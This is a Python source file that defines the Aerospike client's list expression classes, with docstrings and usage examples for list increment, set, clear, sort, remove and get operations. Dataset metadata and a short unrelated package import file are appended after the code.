self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListIncrement(_BaseExpr):
"""Create an expression that increments list[index] by value."""
_op = aerospike.OP_LIST_INCREMENT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Index of value to increment.
value (TypeValue): Value or value expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if incremented value in list bin "a" is the largest in the list.
expr = exp.Eq(
exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, -1, #rank of -1 == largest element.
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a"))),
exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 1,
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a")))
).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListSet(_BaseExpr):
"""Create an expression that sets item value at specified index in list."""
_op = aerospike.OP_LIST_SET
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): index of value to set.
value (TypeValue): value or value expression to set index in list to.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Get smallest element in list bin "a" after setting index 1 to 10.
expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0,
exp.ListSet(None, None, 1, 10, exp.ListBin("a"))).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListClear(_BaseExpr):
"""Create an expression that removes all items in a list."""
_op = aerospike.OP_LIST_CLEAR
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Clear list value of list nested in list bin "a" index 1.
from aerospike_helpers import cdt_ctx
expr = exp.ListClear([cdt_ctx.cdt_ctx_list_index(1)], "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListSort(_BaseExpr):
"""Create an expression that sorts a list."""
_op = aerospike.OP_LIST_SORT
def __init__(self, ctx: TypeCTX, order: int, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
order (int): Optional flags modifiying the behavior of list_sort. This should be constructed by bitwise or'ing together values from :ref:`aerospike_list_sort_flag`.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get value of sorted list bin "a".
expr = exp.ListSort(None, aerospike.LIST_SORT_DEFAULT, "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {_Keys.LIST_ORDER_KEY: order}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValue(_BaseExpr):
"""Create an expression that removes list items identified by value."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE
def __init__(self, ctx: TypeCTX, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Value or value expression to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# See if list bin "a", with `3` removed, is equal to list bin "b".
expr = exp.Eq(exp.ListRemoveByValue(None, 3, exp.ListBin("a")), ListBin("b")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueList(_BaseExpr):
"""Create an expression that removes list items identified by values."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
values (TypeListValue): List of values or list expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements with values [1, 2, 3] from list bin "a".
expr = exp.ListRemoveByValueList(None, [1, 2, 3], exp.ListBin("a")).compile()
"""
self._children = (
values,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRange(_BaseExpr):
""" Create an expression that removes list items identified by value range
(begin inclusive, end exclusive). If begin is None, the range is less than end.
If end is None, the range is greater than or equal to begin.
"""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_RANGE
def __init__(self, ctx: TypeCTX, begin: TypeValue, end: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
begin (TypeValue): Begin value or value expression for range.
end (TypeValue): End value or value expression for range.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove list of items with values >= 3 and < 7 from list bin "a".
expr = exp.ListRemoveByValueRange(None, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
begin,
end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankToEnd(_BaseExpr):
"""Create an expression that removes list items nearest to value and greater by relative rank."""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements larger than 4 by relative rank in list bin "a".
expr = exp.ListRemoveByValueRelRankToEnd(None, 4, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankRange(_BaseExpr):
""" Create an expression that removes list items nearest to value and greater by relative rank with a
count limit.
"""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
count (TypeCount): How many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# After removing the 3 elements larger than 4 by relative rank, does list bin "a" include 9?.
expr = exp.GT(
exp.ListGetByValue(None, aerospike.LIST_RETURN_COUNT, 9,
exp.ListRemoveByValueRelRankRange(None, 4, 1, 0, exp.ListBin("a"))),
0).compile()
"""
self._children = (
value,
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndex(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Index integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3 has been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndex(None, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified index to the end of list."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE_TO_END
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove all elements starting from index 3 in list bin "a".
expr = exp.ListRemoveByIndexRangeToEnd(None, 3, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE
def __init__(self, ctx: TypeCTX, index: TypeIndex, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
count (TypeCount): Integer or integer expression, how many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3, 4, and 5 have been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndexRange(None, 3, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRank(_BaseExpr):
"""Create an expression that removes list item identified by rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove smallest value in list bin "a".
expr = exp.ListRemoveByRank(None, 0, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified rank to the last ranked item."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 2 largest elements from List bin "a".
expr = exp.ListRemoveByRankRangeToEnd(None, -2, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE
def __init__(self, ctx: TypeCTX, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
count (TypeCount): Count integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 3 smallest items from list bin "a".
expr = exp.ListRemoveByRankRange(None, 0, 3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
#######################
# List Read Expressions
#######################
class ListSize(_BaseExpr):
"""Create an expression that returns list size."""
_op = aerospike.OP_LIST_SIZE
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Integer expression.
Example::
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValue(_BaseExpr):
""" Create an expression that selects list items identified by value and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or value expression of element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the index of the element with value, 3, in list bin "a".
expr = exp.ListGetByValue(None, aerospike.LIST_RETURN_INDEX, 3, exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRange(_BaseExpr):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANGE
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_begin: TypeValue,
value_end: TypeValue,
bin: TypeBinName
):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value_begin (TypeValue): Value or value expression of first element to get.
value_end (TypeValue): Value or value expression of ending element.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get rank of values between 3 (inclusive) and 7 (exclusive) in list bin "a".
expr = exp.ListGetByValueRange(None, aerospike.LIST_RETURN_RANK, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
value_begin,
value_end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueList(_BaseExpr):
""" Create an expression that selects list items identified by values and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeListValue): List or list expression of values of elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
#Get the indexes of the the elements in list bin "a" with values [3, 6, 12].
expr = exp.ListGetByValueList(None, aerospike.LIST_RETURN_INDEX, [3, 6, 12], exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRangeToEnd(_BaseExpr):
"""Create an expression that selects list items nearest to value and greater by relative rank"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or vaule expression to get items relative to.
rank (TypeRank): Rank intger expression. rank relative to "value" to start getting elements.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the values of all elements in list bin "a" larger than 3.
expr = exp.ListGetByValueRelRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 3, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRange(_BaseExpr):
""" Create an expression that selects list items nearest to value and greater by relative rank with a
count limit and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or vaule expression to get items relative to.
rank (TypeRank): Rank intger expression. rank relative to "value" to start getting elements.
count (TypeCount): Integer value or integer value expression, how many elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the next 2 values in list bin "a" larger than 3.
expr = exp.ListGetByValueRelRankRange(None, aerospike.LIST_RETURN_VALUE, 3, 1, 2, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndex(_BaseExpr):
""" Create an expression that selects list item identified by index
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_type: int,
index: TypeIndex,
bin: TypeBinName,
):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values
value_type (int): The value type that will be returned by this expression (ResultType).
index (TypeIndex): Integer or integer expression of index to get element at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the value at index 0 in list bin "a". (assume this value is an integer)
expr = exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndexRangeToEnd(_BaseExpr):
""" Create an expression that selects list items starting at specified index to the end of list
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX_RANGE_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
index (TypeIndex): Integer or integer expression of index to start getting elements at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get element 5 to end from list bin "a".
expr = exp.ListGetByIndexRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 5, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndexRange(_BaseExpr):
""" Create an expression that selects "count" list items starting at specified index
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX_RANGE
def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
index (TypeIndex): Integer or integer expression of index to start getting elements at.
count (TypeCount): Integer or integer expression for count of elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get elements at indexes 3, 4, 5, 6 in list bin "a".
expr = exp.ListGetByIndexRange(None, aerospike.LIST_RETURN_VALUE, 3, 4, exp.ListBin("a")).compile()
"""
self._children = (
index,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRank(_BaseExpr):
""" Create an expression that selects list item identified by rank
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_type: int,
rank: TypeRank,
bin: TypeBinName,
):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value_type (int): The value type that will be returned by this expression (ResultType).
rank (TypeRank): Rank integer or integer expression of element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the smallest element in list bin "a".
expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, aerospike.ResultType.INTEGER, 0, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRankRangeToEnd(_BaseExpr):
""" Create an expression that selects list items starting at specified rank to the last ranked item
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
rank (TypeRank): Rank integer or integer expression of first element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the three largest elements in list bin "a".
expr = exp.ListGetByRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, -3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRankRange(_BaseExpr):
""" Create an expression that selects "count" list items starting at specified rank
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK_RANGE
def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
rank (TypeRank): Rank integer or integer expression of first element to get.
count (TypeCount): Count integer or integer expression for how many elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the 3 smallest elements in list bin "a".
expr = exp.ListGetByRankRange(None, aerospike.LIST_RETURN_VALUE, 0, 3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
| 44.009597 | 180 | 0.62748 | 5,447 | 45,858 | 5.10593 | 0.054158 | 0.059255 | 0.066985 | 0.070221 | 0.864087 | 0.846721 | 0.80059 | 0.775061 | 0.755393 | 0.728067 | 0 | 0.003799 | 0.276767 | 45,858 | 1,041 | 181 | 44.051873 | 0.834771 | 0.556631 | 0 | 0.635171 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081365 | false | 0 | 0.028871 | 0 | 0.272966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3146195b876889be4607d2c4e85f93e3654c3441 | 130 | py | Python | src/dataset/__init__.py | ae-foster/cresp | 0215842370d3d665133a496d6d971a537400c674 | [
"MIT"
] | 5 | 2021-11-15T22:49:47.000Z | 2022-02-05T01:39:54.000Z | src/dataset/__init__.py | ae-foster/cresp | 0215842370d3d665133a496d6d971a537400c674 | [
"MIT"
] | null | null | null | src/dataset/__init__.py | ae-foster/cresp | 0215842370d3d665133a496d6d971a537400c674 | [
"MIT"
] | null | null | null | from .r2n2 import R2N2
from .one_dim_functions import *
from .snooker import *
from .collator import *
